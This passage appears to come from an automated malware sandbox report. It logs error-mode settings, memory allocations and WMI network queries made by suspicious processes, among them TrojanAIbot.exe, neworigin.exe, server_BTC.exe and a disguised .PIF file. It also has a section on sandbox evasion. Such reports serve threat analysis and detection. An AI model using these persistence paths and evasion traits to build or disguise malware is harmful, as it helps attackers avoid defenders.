                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2DA0000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2DA1000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2DCD000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2DCE000 memory commit 500350976
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2E24000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F1C000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F1E000 memory commit 500015104
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2DB0000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2DB1000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2DDD000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2DDE000 memory commit 500350976
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2E34000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F2C000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: 2F2E000 memory commit 500015104
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory allocated: 2E60000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory allocated: 2E61000 memory commit 500178944Jump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory allocated: 2E8D000 memory commit 500002816Jump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory allocated: 2E8E000 memory commit 500350976Jump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory allocated: 2EE4000 memory commit 501014528Jump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory allocated: 2FDC000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeMemory allocated: 2FDE000 memory commit 500015104Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 9E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: BF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2F70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 3180000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 5180000 memory reserve | memory write watch
